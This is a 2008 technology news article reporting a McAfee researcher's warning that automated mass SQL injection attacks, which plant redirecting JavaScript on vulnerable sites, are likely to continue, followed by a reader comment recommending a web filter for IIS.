All the latest UK technology news, reviews and analysis
|
|
|
20 May 2008
Security experts have warned that the recent rash of large-scale website attacks may not be a fleeting trend.
McAfee researcher Craig Schmugar believes that the attacks, which simultaneously target hundreds of thousands of web pages, could be a sign of things to come.
The nature of the attacks makes them very hard to prevent, and simply removing the exploit code may not protect sites from further infection.
"The bad guys are using automated tools to find and attack web applications that are vulnerable to SQL injection attacks," said Schmugar.
"Many of these applications are home grown and thus there is no patch or hotfix for administrators to install."
Schmugar's grim assessment follows several SQL injection attacks in recent months. The attackers are believed to have used automated scripts to run input-validation attacks on pages.
The script embeds a small section of JavaScript on the compromised page. Users attempting to access the pages are silently routed to a third-party site run by the attacker.
This page then attempts to execute a number of browser exploits in an effort to install malware.
Schmugar explained that the problem could be solved by updating pages to prevent the attacks, but that a fix will not be easy to come by.
"The entry point for these attacks must be closed in order to thwart future attacks. This means that underlying code must be audited and improper input-validation must be corrected," he said.
"Given that many web administrators install out-of-support freeware and shareware applications, we can expect many sites to remain vulnerable for a long time."
Latest stories from Security
Related articles
Related jobs
Poll
What is the most important IT priority for your company this year?
Hands on with the highly anticipated Android 4.0 Ice Cream Sandwich hybrid tablet
Connect with V3.co.uk
This paper focuses on a series of best practices and techniques for development teams looking to improve their software development processes
Why good data management at all levels is essential in the modern business (video, 6mins)
Project Manager (BI) 6 Months Contract – to...
Desktop Support Manager 3 month contract - to start...
/ Programme Manager / 45k / Significant benefits / London...
Automation Test Manager Selenium London 75k Automation...
Keep up to date with the latest products, services and technologies from the world's leading IT companies. IThound.com brings you over 2,000 white papers, case studies and analyst reports.
Do you agree?
There is a solution for administrators
If you take the time to configure it correctly and make sure that it doesn't break your web application(s), Aqtronix Webknight is a great way to block these attacks. Essentially, it filters out injection keywords. If you end up using this software, just be aware that its default configuration is VERY VERY VERY strict and will likely block your entire site if you leave it at default. Installs as an ISAPI filter for IIS. Once it's configured right, it's nice to see these exploits being blocked :)
Posted by: A. 20 May 2008